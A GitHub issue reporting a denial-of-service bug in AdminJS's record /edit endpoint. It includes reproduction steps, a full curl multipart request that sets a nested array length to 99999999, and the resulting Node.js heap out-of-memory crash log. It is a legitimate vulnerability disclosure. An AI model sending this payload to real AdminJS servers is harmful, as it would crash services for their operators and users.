Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[Bug]: DDoS via the /edit endpoint #1685

Open
nostalgiaz opened this issue Jul 19, 2024 · 0 comments
Open

[Bug]: DDoS via the /edit endpoint #1685

nostalgiaz opened this issue Jul 19, 2024 · 0 comments
Labels
bug Something isn't working

Comments

@nostalgiaz
Copy link

nostalgiaz commented Jul 19, 2024
edited
Loading

Contact Details

No response

What happened?

This is a vulnerability that stems from a lack of validation of the nested parameters.

How to reproduce:

  • git clone [email protected]:nostalgiaz/adminjs-ddos.git
  • cd adminjs-ddos
  • npm i
  • docker-compose up -d
  • DATABASE_URL=postgresql://dbtest:dbtest@localhost:5442/dbtest?schema=public npm run migrate
  • DATABASE_URL=postgresql://dbtest:dbtest@localhost:5442/dbtest?schema=public npm run dev
  • curl http://localhost:8080/set-up
  • open the admin and login (no credentials needed)
  • copy and paste the connect.sid cookie in the following curl:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: localhost:8080' \
-b $'connect.sid={COOKIE}' \
-H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBbtRxb7caACJwTiZ' -H $'Content-Length: 270' \
--data-binary $'------WebKitFormBoundaryBbtRxb7caACJwTiZ\x0d\x0aContent-Disposition: form-data; name=\"previewData.rows.0.0\"\x0d\x0a\x0d\x0ax\x0d\x0a------WebKitFormBoundaryBbtRxb7caACJwTiZ\x0d\x0aContent-Disposition: form-data; name=\"previewData.rows.0.length\"\x0d\x0a\x0d\x0a99999999\x0d\x0a------WebKitFormBoundaryBbtRxb7caACJwTiZ\x0d\x0a' \
    $'http://localhost:8080/admin/api/resources/TestModel/records/1/edit'

Check the server shell: this is what I get.

<--- Last few GCs --->

[25778:0x158008000]    64915 ms: Scavenge 3898.2 (3976.8) -> 3895.0 (3982.6) MB, 15.92 / 0.00 ms  (average mu = 0.385, current mu = 0.281) allocation failure;
[25778:0x158008000]    72272 ms: Mark-Compact 4477.8 (4556.4) -> 4091.3 (4185.1) MB, 6399.42 / 0.00 ms  (average mu = 0.251, current mu = 0.172) allocation failure; scavenge might not succeed


<--- JS stacktrace --->

FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
----- Native stack trace -----

image
image

Demo repo: https://github.com/nostalgiaz/adminjs-ddos

Bug prevalence

On specific a request

AdminJS dependencies version

What browsers do you see the problem on?

Firefox, Chrome, Safari, Microsoft Edge

Relevant log output

No response

Relevant code that's giving you issues

No response
@nostalgiaz nostalgiaz added the bug Something isn't working label Jul 19, 2024
@nostalgiaz nostalgiaz changed the title [Bug]: DDoS via edit endpoint [Bug]: DDoS via the /edit endpoint Jul 19, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@nostalgiaz